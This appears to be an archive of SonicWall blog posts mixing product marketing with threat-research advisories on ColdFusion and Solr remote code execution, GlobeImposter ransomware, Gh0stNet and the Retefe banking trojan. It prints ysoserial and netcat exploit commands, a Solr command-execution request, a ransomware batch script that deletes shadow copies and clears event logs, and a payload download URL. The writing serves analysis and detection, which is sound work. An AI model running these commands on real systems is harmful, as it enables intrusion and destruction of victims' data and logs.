SonicWall and our Channel Partners Team to Deliver New High-Value Security Professional Services to Fight the Bad Guys

I can only imagine the pressure that comes with the job of being responsible for a company’s network security. These individuals are not only entrusted with protecting company and customer data, but the reputation of the company and its brand. In the case of smaller businesses, the stakes are particularly high, where a network breach and data loss can threaten the very existence of the company. According to the Ponemon Institute Cost of a Data Breach 2017 study, the average total cost of a data breach is $3.62M, and over 60 percent of SMBs cease to exist 6 months following a data security breach. Add to these grim statistics the incredible rise in malware, ransomware and other advanced threats in a constantly evolving cyber threat landscape and you have the plot of a very scary true (cyber) crime movie – the good guys vs. the bad guys.

Network security vendors like SonicWall and the channel partners who integrate our products into security solutions for their customers are most often the first line of defense to help organizations defend against the bad guys. These organizations rely on SonicWall to deliver highly efficient security products that can stop today’s known and unknown threats. And they rely on our channel partners as their trusted advisors to deliver their security solution. With so much at stake, it is critical that the right SonicWall products are designed into the security solution, and just as critical that the solution is implemented properly and optimized for the customer’s environment and business requirements. Even the best security products, if not properly spec’d and implemented, can leave an organization vulnerable. To address this reality, SonicWall has announced the launch of a new lineup of valuable professional security services to help customers and channels design, implement and operate SonicWall security solutions that keep the bad guys at bay and defend against their relentless cyber attacks.

Organized around three areas of competency, the security professional service offerings were jointly developed and blueprinted by SonicWall and a group of channel partners (the good guys) with deep security services expertise. Each service incorporates the real-world services experience of these partners, essential knowledge gained through hundreds of services engagements.

The services include:

  • Implementation Services – compliance audit prep, remote and onsite implementation services for SonicWall products
  • Solution Services – security health checks, wireless security deployments, campus network and distributed network solutions.
  • Architecture Services – more complex or large-scale solutions and customer environments, such as DPI-SSL deployment or SuperMassive next-gen firewall implementations.

It makes so much sense to have these types of services surround the SonicWall product portfolio, as a means to ensure our customers have the best possible protection. As SonicWall’s Channel Chief, I’m equally proud of the new services as I am of the way in which they are delivered.

This is where our new Partner Enabled Services Program comes in. Just launched, the program identifies and showcases SonicWall SecureFirst channel partners who have a security focused professional services practice and enables them to deliver the new services. These partners are vetted, granted status as a SonicWall Advanced Authorized Services Partner and given access to exclusive training, tools, sales, marketing and technical resources. All of the services are branded and sku’d by SonicWall, so the entire SonicWall channel can resell them. Once sold, the services are delivered by the Advanced Services Partners.

This breakthrough approach to delivering professional security services is only possible due to the collaboration and trust that exists within the incredible SonicWall channel partner ecosystem – one that has developed over the last 25 years. SonicWall channel partners genuinely trust each other to engage respectfully with their customers to deliver high-grade professional security services and, in doing so, they deliver the most effective security solution and drive incremental opportunity for their business. With this program, SonicWall’s broad channel, our Authorized Services Partners, and most importantly, our customers, can join forces to fight the bad guys and win the war against cyber attacks. Score one for the good guys!

Feedback from our channel on this approach to services offer creation and delivery has been fantastic.

“This year marks 20 years of our relationship with SonicWall and we are excited about deepening our engagement with SonicWall and showcasing our SonicWall based services expertise through the Partner Enabled Services Program. The Exertis team is highly skilled in SonicWall distributed architecture deployments, proven time and again to be the real leader when customer security is at stake,” said Jason Hill, Security Sales Director of Exertis in the United Kingdom, a leading SonicWall distributor in Europe.

“As a dedicated SonicWall Platinum Partner with a mature services practice, we are delighted to see SonicWall making such significant investments in driving partner growth in security services. Our team of security experts have a passion for security and phenomenal service,” said Timothy Martinez, President of Western NRG Total Internet Security, based in Camarillo, California. “With more than 15 years of SonicWall implementations, we go to battle for our customers in the cyber arms race. The Partner Enabled Services Program is an excellent opportunity to grow our services further with SonicWall.”

“Our unwavering commitment is to protect and empower our customers against today’s most damaging cyber attacks,” said Michael Crean, CEO of Solutions Granted, a SonicWall SecureFirst Platinum partner in Virginia. “In our case, as one of SonicWall’s longest-term Managed Security Services Providers, this requires additional services and expertise to ensure we’re delivering the value and guidance our customers require to be secure. SonicWall understands our needs and, yet again, delivers the structure, resources, training and incentives to enhance customer loyalty, satisfaction and market recognition.”

Customers interested in the new security professional services should contact their SonicWall channel partner. For interested SecureFirst Partners, we have a webinar planned for Nov. 30 at 8:30 am PT: Grow your Services Business with the New Partner Enabled Services Program.

Blackfriday brings malicious apps to the Android ecosystem

The month of November brings a lot of shopping deals thanks to Black Friday. The deals and discounts are in abundance online as well as in stores. These days there is an app for everything, and shopping is no exception: there are apps from all major online retailers, as well as apps dedicated to showcasing the best deals from across the marketplace.

The month of November sees a spike in installations of such shopping apps, which naturally makes it a good opportunity for malware writers to spread their malicious apps. We will document our findings for 2017 with regard to Black Friday:

DroidJack

One of the first apps we observed being distributed was DroidJack under the name amazon. We have covered DroidJack in the past, where it masqueraded as different apps, here and here.

Clearly the internal structure remains the same; however, the malware writers are using Black Friday as a means to spread their apps. A point to note, though: the current app only uses the name amazon and nothing else. No effort was made to copy the icon.

It is interesting to note that the author of this app has been creating malicious apps with DroidJack components in them, and just around the shopping season the author created a DroidJack-infested app with the name amazon.

We will continue to update this blog with new findings as the Thanksgiving season reaches its peak.

Sonicwall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.DroidJack.MA_2 (Trojan)

Sample analyzed:

  • App name: amazon
  • Package name: net.droidjack.server
  • MD5: bc66d909ea906dc5933e7dacd6a461d1


Adobe ColdFusion RMI Registry Insecure Deserialization Vulnerability

Adobe ColdFusion is a popular application development platform. A vulnerability, CVE-2017-11284, has been reported in Adobe ColdFusion. Due to the lack of input validation on objects in the RMI Registry before deserialization, an attacker could execute arbitrary commands with root privileges. Adobe Systems ColdFusion 11 prior to Update 13 and Adobe Systems ColdFusion 2016 release prior to Update 5 are affected by this vulnerability.

Java supports a feature called serialization, which allows Java objects to be packed into a byte stream and deserialized by another Java application (such as an applet). The readObject() and writeObject() methods of the Serializable interface are used for serializing and deserializing.

Java Remote Method Invocation (RMI) is a service that supports cross-JVM method calls. By default it listens on port 1099. When serialized data is received in a request to the RMI service of Adobe ColdFusion, an attacker could include malicious data that calls an exploitable library in the code path, triggering remote code execution.

To exploit this vulnerability, a payload containing a malicious serialized object is needed. An open-source proof-of-concept tool called “ysoserial” can generate such payloads, which lowers the bar for an exploit:

    $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
    0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
    0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
    0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
    ...
    0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
    0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
    0000570: 0078 7071 007e 003a                      .xpq.~.:

    $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
    $ nc 10.10.10.10 1099 < groovypayload.bin

    $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

SonicWall has developed the following signature to identify and stop the attacks:

  • IPS 13048: Adobe ColdFusion RMI Registry Insecure Deserialization

GlobeImposter Ransomware renders system unbootable

The SonicWall Capture Labs Threat Research Team has come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and, as with all ransomware, encrypts the victim’s files, making them irrecoverable without payment. Most ransomware has a built-in file extension filter that leaves executable files intact. This ransomware, however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%\{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encrypted files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to true_offensive@aol.com and received the following reply:

If %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

    @echo off
    vssadmin.exe Delete Shadows /All /Quiet
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    cd %userprofile%\documents
    attrib Default.rdp -s -h
    del Default.rdp
    for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)

SonicWall First to Identify 73 Percent of New Malware with Capture ATP Sandbox

Last month, I wrote how we found nearly 26,500 new forms of malware and shared some general stats. Let’s take a look at the new threats found by SonicWall’s network sandbox, Capture Advanced Threat Protection (ATP).

While the general number of new threats dropped, there were some interesting figures and trends to point out.

Of the 16,115 new forms of malware and zero-day attacks:

  • Only 4,321 were known by one other security firm (that we partner with), just moments before us
  • This means over 73 percent (11,794) were never seen until SonicWall identified them

This is very encouraging because it demonstrates three important points:

  1. The SonicWall customer base of Capture ATP subscribers is protecting each other by serving up samples before researchers can find them
  2. The technology is working wonderfully
  3. The month-over-month data proves that SonicWall is your best defense against new threats

Interestingly, last year at this time, I was finding a lot of ransomware versions by the big boys, such as Locky & Cerber. Now we are seeing attacks from copycat malware authors who conduct smaller attacks. The overall numbers are down, but the number of cybercriminals involved is up. As a result, a lot of ransomware attacks may fly under the radar.

Plus, this is what is now hitting the radar: credware.

What is Credware?

Credware is a term for a type of malware that is designed to steal credentials — and I’m finding a lot of credware every day, in many formats. I see new forms of spyware and a lot of Trojans that are going after all of those saved passwords in browsers. Since Chrome is harder to attack, hackers are targeting saved passwords in Firefox, Safari, Opera, Internet Explorer, and Edge. (See below).

Infected Documents

Hackers are adding their new versions of malware inside of documents, such as Microsoft Word files and PDFs. On a typical day, I saw that roughly 3-6 percent of new malware samples are found in these file types, but I have noticed a large increase as the days progressed.

Some days, as much as 39.3 percent of malware is found in digital documents, mostly Office files. Even if I set a high baseline of 5 percent, you can see how some days have an alarming rate of malicious documents (See below).

What is also surprising about this data is that you would expect a lot of this to be found in email traffic. Although most of it was, a lot of it was not, especially PDFs. In fact, on Sept. 26, 82 percent of malicious PDFs were found online by protected customers.

This data comes on the heels of SonicWall improving its backend performance for how quickly we can examine and return a verdict for PDFs. As we look back at the data, I’m happy to announce that the median time to process a file is around one second, and 71.3 percent of all files in September were processed with a verdict in under five seconds.

If you’d like more information on how you can add Capture ATP to protect your network and network based endpoints read: Executive Brief: Why network sandboxing is required to stop ransomware.

California School District Amps Up Content Filtering with SonicWall’s Security-as-a-Service

We know how much value SonicWall network security brings to our customers, and we know how much value our partners add when incorporating our solutions into their solutions for our customers.

The case of Calistoga Unified Regional School District is an excellent example.

Calistoga is in California’s Napa Valley. The district has more than 850 students, divided among an elementary school, junior/senior high school and an alternative-program continuation high school for students between the ages of 16 and 18. Administration offices are in a separate building near the junior/senior high school.

The district felt that its existing content-filtering services were not providing all the functionality it needed. Calistoga couldn’t get the flexibility and granular control over content filtering it needed to define different roles and access permissions for students, faculty and staff.

Like all K-12 school districts, Calistoga’s content filtering is there to protect against inappropriate and malicious web content, as well as to control application access.

“Our No. 1 priority is making sure that the students are protected,” says Jenna Burrows, Calistoga’s Director of Business Services.

Regulatory requirements regarding content filtering are also part of the picture. The Children’s Internet Protection Act (CIPA) is the most directly relevant. Content filtering is also important with regard to the Family Educational Rights and Privacy Act (FERPA), which protects students’ personally identifiable information (PII) from unauthorized disclosure, and is a requirement for districts to be eligible for discounts through the federal E-rate program.

Faced with a clear need to upgrade their content-filtering capabilities, Calistoga turned to their local managed services provider, Napa Valley Networks (NVN). NVN has been a SonicWall partner for more than 15 years. NVN recommended SonicWall’s Content Filtering Service for Calistoga.

But NVN didn’t stop with content filtering. After an initial audit of Calistoga’s network, they uncovered an issue with the district’s gateway. NVN’s Vice President and Chief Technology Officer, Kyle Lumley, says the existing gateway “didn’t give them the control or feature set that they needed.”

NVN’s recommendation for Calistoga was a SonicWall SuperMassive 9800 next-generation firewall with High Availability capability.

All well and good so far. More granular, customizable content filtering and a new gateway to provide better control for the present, as well as being better able to handle future increases in networked devices and utilization.

Then came the 400-pound gorilla. How could Calistoga afford to pay for these improved capabilities? School districts work under very tight financial constraints.

Fortunately, NVN and SonicWall had a solution.

Calistoga leveraged SonicWall’s Security-as-a-Service (SECaaS). Rather than paying a large amount upfront as a capital expenditure, Calistoga pays a much more manageable monthly fee which fits within its operating budget. Burrows says this is a much more reasonable solution for the district.

Additionally, much of the cost is eligible for discounts through the federal E-rate program.

NVN coordinated the transition to the new gateway and Content Filtering Service. All went well, even in the face of tight deadlines. Calistoga’s happy with the results.

Read the Case Study here.

Gh0stnet now spreads as a fileless malware

The SonicWall Capture Labs Threat Research team recently observed a new version of the Gh0stNet backdoor spreading via a fileless technique, using a PowerShell script for initial execution. This version of Gh0stNet uses new commands for communication.

Infection Cycle:

Upon execution the script spawns powershell.exe to perform malicious activities.

Fig1. Trojan uses powershell.exe to download and register itself as a startup item

Figure 1 shows that the script downloads Base64-encoded data from a pastebin.com address. It then decodes and unzips the data to get the next-level PowerShell script. The second-stage PowerShell script is shown in the figure below:

Fig2. Base64 Encoded shellcode

After decoding the Base64-encoded shellcode, it calls the “Inject-LocalShellcode” function to inject the shellcode into the running instance of PowerShell, as shown in the figure below:

Fig3. Powershell Shellcode injection

The injected shellcode contains code to unpack the embedded UPX packed file (without headers) and execute the unpacked code. Figure 4 below shows the UPX packed file that is present in the injected shellcode.

Fig4. Embedded UPX packed file

When the UPX-unpacked code executes, it first decodes the Config string using a custom Base64 decoding key, as shown below:

Fig5. Decrypting the config URL using a custom key

Visiting the URL shows seemingly encoded information.

Fig6. Some encoded data shown on the page of the decoded URL

Figure 7 below shows that the malware searches for the marker “x=” in the response to its POST request to the URL. Once the marker is found, it decodes the string following the marker to get the second-stage command and control server.

Fig7. Decoded response from the URL

After this, the backdoor starts communication with the command and control server by sending the following request:

Fig8.Scote_connection|hwid = [customid _from_created_cpuid]

It then creates a thread that listens for incoming commands from the command and control server.

The following are the commands sent from the remote server:

  • scote_info_ipconfig
  • scote_info_systeminfo
  • scote_drop
  • scote_upgrade
  • scote_upgrade_internal

Below are the functionality details for each command:

  • scote_info_ipconfig: in response to this command the backdoor collects the IP configuration by executing the “cmd.exe /C ipconfig” command. It then encrypts the output using a custom Base64 key and sends it to the C&C server in the format “command=scote_info_ipconfig|buffer=[Encrypted IP Config]”. The figure below shows that response packet.

    Fig9. Sample response to scote_info_ipconfig command

  • scote_info_systeminfo: in response to this command the backdoor collects the system information by executing the “cmd.exe /C systeminfo” command. It then encrypts the output using a custom Base64 key and sends it to the C&C server in the format “command=scote_info_systeminfo|buffer=[Encrypted System Info]”. The figure below shows that response packet:

    Fig10. Sample response to scote_info_systeminfo command

  • scote_drop: the backdoor terminates after receiving this command.

  • scote_upgrade: after receiving this command the backdoor injects its code into “svchost.exe” and “explorer.exe” and terminates itself. Before code injection, the backdoor installs a hook on “ntdll.ZwDelayExecution” to evade analysis and performs the code injection through the hooked function, as shown below:

    Fig11. Code injection through another hooked function

SonicWALL Capture Labs provides protection against this threat with the following signature:

  • GAV: Ghostnet.A (Trojan)

Apache Solr Remote Code Execution Vulnerability

Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported in Apache Solr before version 7.1, which allows an attacker to send certain crafted HTTP requests to execute arbitrary commands on a remote server.

The code execution vulnerability

Solr uses the term “collection” to define a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr by sending requests to the following URI:

http://[host]:8983/solr/[collection]/select?q=[query]

where [collection] is the collection name to perform the query on, and [query] is a query using any supported query syntax. Such a request is sent as an HTTP POST request and is handled by the Apache Lucene parser.

Solr supports the use of event listeners, which can be used to trigger actions based on various events sent to the collection (e.g. updating a collection). Event listeners require an event type as well as a handler class. Handler classes may be either a custom class or a built-in class. Solr’s “RunExecutableListener” class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such a listener can be enabled with any parameters just by using the Config API (http://[host]:8983/solr/[collection]/config) with the add-listener command:

    POST /solr/newcollection/config HTTP/1.1
    Host: localhost:8983
    Connection: close
    Content-Type: application/json
    Content-Length: 198

    {
      "add-listener" : {
        "event":"postCommit",
        "name":"somelistener",
        "class":"solr.RunExecutableListener",
        "exe":"[command]",           <--- Arbitrary command
        "dir":"solr/bin",            <--- Command path
        "args":["foo","bar"]         <--- Command params
      }
    }

When the postCommit event is triggered, the remote command will be executed with the privileges of the Solr server process.

The above-mentioned vulnerability is sufficient for a local privilege escalation attack. To exploit this vulnerability without direct access to the Solr server, there is another vulnerability that can be exploited in a chained attack: the XML external entity expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the Lucene XML parser not prohibiting DOCTYPE declarations or the expansion of external entities. A query can be crafted that causes Solr to make requests via localhost when it attempts to resolve an external entity, resulting in server-side request forgery.

For example, when the following request is handled by Apache Solr, an HTTP GET request to evilurl.com will be made.

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v=''}

Combined with this vulnerability, the attacker could send local requests to the server, turning a local code execution vulnerability into remote code execution.

An exploit is already in the wild on exploit-db. A real-world attack consists of 3 parts:

  1. Create a new collection to prepare the URL for the local code execution, using the second vulnerability to call the localhost service URL. (If a collection name is known to the attacker, this step can be skipped.)
  2. Trigger the code execution vulnerability using the collection name created in step 1, with a request of the following form:

     http://localhost:8983/solr/[collection]/select?q=foo&qt=/solr/newcollection/config?stream.body=&shards=localhost:8983/

  3. Update "newcollection" through XXE to trigger execution of RunExecutableListener, using the same request format as in step 2.

The malicious command contained in step 2’s JSON payload will then be executed.
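The two request shapes described above lend themselves to a request-side check. What follows is an added Python example (not SonicWall's IPS logic) that flags a Config API body registering solr.RunExecutableListener, a select query whose {!xmlparser} local parameter carries a DOCTYPE or entity declaration, and the chained form in which qt= and shards= route a config call with the listener JSON in stream.body. The sample requests are constructed; the command string is the page's "[command]" placeholder.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs, quote

# {!xmlparser ...} local params in q, carrying a DOCTYPE or entity declaration
XMLPARSER_RE = re.compile(r"\{!xmlparser\b", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def listener_findings(body: str) -> list:
    """Flag add-listener/update-listener commands in a Config API body that
    register a RunExecutableListener or pass an 'exe' key."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []
    if not isinstance(doc, dict):
        return []
    findings = []
    for cmd in ("add-listener", "update-listener"):
        entries = doc.get(cmd)
        if entries is None:
            continue
        if isinstance(entries, dict):
            entries = [entries]
        for entry in entries:
            if not isinstance(entry, dict):
                continue
            cls = str(entry.get("class", ""))
            if cls.endswith("RunExecutableListener") or "exe" in entry:
                findings.append(
                    f"{cmd}: {cls or '?'} on event {entry.get('event', '?')} "
                    f"exe={entry.get('exe', '?')}"
                )
    return findings


def xxe_findings(q: str) -> list:
    """Flag an {!xmlparser} query that declares a DOCTYPE or entity."""
    if XMLPARSER_RE.search(q) and DOCTYPE_RE.search(q):
        return ["xmlparser query with DOCTYPE/ENTITY (possible XXE/SSRF)"]
    return []


def inspect_request(method: str, url: str, body: str = "") -> list:
    """Return the findings for one Solr HTTP request (method, URL, body)."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # (1) direct Config API call carrying a listener command
    if parts.path.rstrip("/").endswith("/config") and method.upper() == "POST":
        findings += listener_findings(body)
    # (2) XXE/SSRF through the xmlparser query parser
    for q in params.get("q", []):
        findings += xxe_findings(q)
    # (3) the chained form: qt= points the shard request at /config and
    # stream.body carries the JSON that would otherwise be POSTed there
    qt = params.get("qt", [""])[0]
    if "/config" in qt and "shards" in params:
        findings.append("qt/shards redirection to Config API")
        inner = parse_qs(qt.partition("?")[2], keep_blank_values=True)
        for sb in inner.get("stream.body", []) + params.get("stream.body", []):
            findings += listener_findings(sb)
    return findings


# Constructed samples. LISTENER_JSON is the body shown on the page with the
# command left as the placeholder "[command]".
LISTENER_JSON = json.dumps({"add-listener": {
    "event": "postCommit", "name": "somelistener",
    "class": "solr.RunExecutableListener",
    "exe": "[command]", "dir": "solr/bin", "args": ["foo", "bar"]}})
CONFIG_URL = "http://localhost:8983/solr/newcollection/config"
CHAINED_URL = ("http://localhost:8983/solr/gettingstarted/select?q=foo&qt="
               + quote("/solr/newcollection/config?stream.body=" + LISTENER_JSON, safe="")
               + "&shards=localhost:8983/")
XXE_URL = ("http://localhost:8983/solr/gettingstarted/select?q="
           + quote("{!xmlparser v='<!DOCTYPE x SYSTEM \"http://localhost:8983/solr/\"><x/>'}", safe=""))
BENIGN_URL = "http://localhost:8983/solr/gettingstarted/select?q=title:laptop"

if __name__ == "__main__":
    for m, u, b in [("POST", CONFIG_URL, LISTENER_JSON), ("GET", CHAINED_URL, ""),
                    ("GET", XXE_URL, ""), ("GET", BENIGN_URL, "")]:
        print(m, urlsplit(u).path, "->", inspect_request(m, u, b) or "clean")
```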

The SonicWall Threat Research team has analyzed the vulnerability and developed the following signatures:

  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2

Move to the Cloud and Enable Secure Collaboration with SonicWall SMA OS 12.1

Moving to the cloud and enabling mobility are top IT priorities for organizations of all sizes. Today, most businesses have adopted a hybrid IT model, which includes legacy on-premise applications in local data centers and popular SaaS applications hosted in the cloud.

Securing this hybrid IT environment, while providing a consistent experience — with anytime, any device, any application access to authenticated users — remains a key challenge for the IT department.

Keeping those priorities in mind, SonicWall today launched the new OS 12.1 for its Secure Mobile Access (SMA) appliances.

Move to the Cloud

For organizations embarking on a cloud migration journey, SMA offers a single sign-on (SSO) infrastructure that uses a single web portal to authenticate users in a hybrid IT environment. Whether the corporate resource is on-prem, on the web or hosted in the cloud, the access experience is consistent and seamless. SMA also integrates with industry-leading multi-factor authentication technologies for added security.

Mobility and BYOD

For organizations wishing to embrace BYOD, flexible working or third-party access, SMA becomes the critical enforcement point across them all. SMA delivers best-in-class security to minimize the threat surface, while making organizations more secure by supporting the latest encryption algorithms and ciphers.

SonicWall SMA allows administrators to provision secure mobile access and role-based privileges so end-users get fast, simple access to the business applications, data and resources they require. At the same time, organizations can institute secure BYOD policies to protect their corporate networks and data from rogue access and malware.

Managed Service Providers

For managed service providers or organizations hosting their own infrastructure, SMA provides turnkey solutions to deliver a high degree of business continuity and scalability. SMA can support up to 20,000 concurrent connections on a single appliance, with the ability to scale upwards of hundreds of thousands of users through intelligent clustering.

Data centers can reduce costs with active-active clustering and a built-in dynamic load balancer, which reallocates global traffic to the most optimized data center in real time based on user demand. SMA tool sets enable service providers to deliver services with zero downtime, allowing them to fulfill very aggressive SLAs.

Key New Features

The new 12.1 firmware addresses the above use cases with the following new capabilities:

Federated Single Sign-On

SMA OS 12.1 delivers secure access from a single URL to Microsoft Office 365 and other cloud SaaS applications that use the SAML 2.0 authentication protocol. SMA fits seamlessly into an organization’s existing infrastructure and enables federated single sign-on (SSO), using a single pane-of-glass web access portal, to applications hosted in the cloud or in a local data center. A single login event (without requiring a VPN tunnel) can create a secure session for authenticated users with authenticated devices to any business application.

Read our tech brief to find how SonicWall SMA achieves identity federation for access requests initiated by both service providers and identity providers.

Secure File Share

The release innovates in the realm of access security by offering the capability to scan files uploaded by unmanaged endpoints to the corporate network. Documents uploaded using personal or BYOD devices (unmanaged endpoints) by remote workers, third-party contractors or office employees with full VPN access to corporate network, typically bypass network security and are not inspected by a firewall. SMA OS 12.1 addresses this security gap by providing a secure file share mechanism.


Read our tech brief to find how SonicWall SMA stops malicious files from entering your corporate network.

SMA provides a web-based HTML5 file explorer for users to upload their documents, which are scanned by the cloud-based, multi-engine Capture ATP sandbox service for ransomware, zero-day threats and unknown malware. The verdict is delivered in near real-time, and suspicious files are rejected.

Capture ATP file scan reports are available on mysonicwall.com with detailed user session information.

The central management server (CMS) for SMA provides reporting and monitoring capabilities, including Capture ATP test results and session information (such as user ID and IP address). In addition, when the solution is deployed with a SonicWall next-generation firewall, SMA shares the session information with the firewall. This enables end-to-end network visibility, and provides an audit trail for reporting and compliance.

Universal Session Persistence

An enhancement to the global high-availability feature is session persistence in the event of a failover. User session data is replicated across the mesh network of SMA appliances in an active-active global cluster. In the event of a disaster or appliance failure, service owners can now deliver zero-impact failover that provides a frictionless experience to users without the need to re-enter credentials. This feature empowers service providers to adhere to stringent Service Level Agreements (SLAs) and deliver near zero downtime service.

New Licenses

In addition to new features, SMA OS 12.1 introduces “Secure Email Access” subscription licenses. This enables organizations to implement and pay only for their specific usage scenario (e.g., email with ActiveSync or Outlook Anywhere), significantly reducing total cost of ownership for customers. These licenses are centrally managed and distributed in real time based on user demand, across global datacenters.

SonicWall SMA OS 12.1 builds upon the vision to deliver true “anytime, any device, any application” secure access to your workforce. The solution enables organizations to embrace mobility and BYOD without fear, and move to the cloud with ease.

SMA OS 12.1 is compatible with SMA appliances 6200, 7200, 8200v and EX 9000. Customers with an active support contract are eligible for a free upgrade on mysonicwall.com. Download the new SonicWall SMA 12.1 here.

New version of Retefe Banking Trojan Uses EternalBlue

The Retefe Banking Trojan first appeared in mid-2013, targeting Switzerland, Austria and Sweden as well as some banking sites in the United Kingdom. It spread through a spam campaign pretending to be from Swiss banks, carrying a malicious RTF attachment with an embedded malicious executable, either an .exe file or a Control Panel file (.cpl).

Retefe makes the following changes in a victim’s machine:

  • Changes the DNS setting to a rogue DNS server.
  • Installs a rogue CA (certificate authority).

Changing the DNS setting now allows the victim’s online banking session to be redirected to a fake banking portal. The fake CA certificate installed is used to avoid SSL certificate errors when browsing the fake website.

In 2015, an updated Trojan was released which used proxy auto-config (PAC) instead of a fake DNS. With this method, instead of redirecting the victim’s entire web traffic, only certain domain names configured in the PAC were redirected to the proxy server that served as the fake banking portal.

The image below shows the proxy PAC configuration:

The SonicWall Capture Labs Threat Research team recently observed a new email campaign with an updated version of this threat. The updated version of Retefe malware has been observed to use the EternalBlue exploit to spread internally on the network.

The email contains a document file attachment which contains a Package Shell Object or an OLE object, which in this case is a Windows shortcut (.lnk) file:

The above image shows the document file delivered by email which contains the OLE object. Upon clicking on the .lnk file, it shows a warning message as shown in the above image. It subsequently runs the PowerShell command:

The target field of the OLE object contains an obfuscated PowerShell command. After de-obfuscation, we can see it downloads the payload from URL: Hxxp://ipezuela.com/fwltxgf.exe.

The downloaded executable payload file in the current campaign is a self-extracting ZIP archive that contains an obfuscated JavaScript file. This obfuscated JavaScript is the installer; the extracted obfuscated JavaScript file is shown below:

The de-obfuscated JavaScript:

In the above de-obfuscated JavaScript, there are several parameters in “cfg”:

  • dl:- A list of proxy servers hosted on TOR.
  • cert:- A fake root certificate, Base64-encoded.
  • ps:- Base64-encoded PowerShell script that installs the certificate for Internet Explorer.
  • psf:- Base64-encoded PowerShell script that installs the certificate for Firefox.
  • pstp:- Base64-encoded PowerShell script that downloads and installs TOR.
  • pseb:- Base64-encoded PowerShell script containing the EternalBlue exploit used to spread.

The JavaScript decodes the above parameters in “cfg” one at a time. The decoded parameters are additional PowerShell scripts that perform the intended activities: installing TOR, installing a certificate for Internet Explorer, installing a certificate for Firefox and running the EternalBlue exploit.

First, the JavaScript installs TOR and other utilities by running a PowerShell script:

The Base64-encoded function above decodes to the “cfg.pstp” parameter, which is then executed with PowerShell. The script first generates a random number and uses it as an index to select a domain from “cfg.dl” (the TOR-hosted domains), replacing %DOMAIN% in the PowerShell script (in this case, cfg.pstp) with the selected domain. It then executes the decoded script with PowerShell using the parameters -ExecutionPolicy Unrestricted -File. The decoded PowerShell script which downloads and installs TOR is shown below:

The above script (cfg.pstp) downloads TOR from one of the TOR mirror sites into %appdata%\Ad0be. It then adds a scheduled task to start the TOR browser (tor.exe). The scheduled task is executed in the context of “mshta.exe”, as the actual command to be executed is wrapped inside JavaScript.

It also downloads socat.exe and creates a scheduled task for it:

The purpose of this scheduled task is to set up the TOR SOCKS proxy, where %DOMAIN% is replaced by one of the TOR sites present in the JavaScript.

The JavaScript then decodes another PowerShell script that installs the certificate for IE:

The Base64-encoded function above decodes to “cfg.ps” and replaces %CERT% in the decoded script with the fake root certificate “cfg.cert”. It then executes PowerShell with the parameters -ExecutionPolicy Unrestricted -File.

Below is the PowerShell script that installs the certificate for IE:

After installing the certificate, it installs PAC (proxy-auto config) for Internet Explorer:

The following are the registry entries used to set the PAC:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL

After installing the certificate and PAC for IE, the JavaScript decodes a PowerShell script that installs the fake certificate for Firefox and configures the PAC for Firefox:

PowerShell script to install certificate for Firefox:

InstallPac() configures the PAC for Firefox and unblocks .onion sites:

After installing the fake certificate and configuring the PAC for both IE and Firefox, it kills the following running applications:

  • taskkill /F /im iexplore.exe
  • taskkill /F /im firefox.exe
  • taskkill /F /im chrome.exe

The JavaScript finally decodes the PowerShell script that implements the EternalBlue exploit. This script also uploads a log file to the remote server over FTP. The LogWrite() function in the script writes the log to the log file, and the UploadLog() function uploads the log file to the remote server as shown below:

The PowerShell script collects the following information from the system to upload to the server, using its CheckInstall() function:

  • Operating system information:
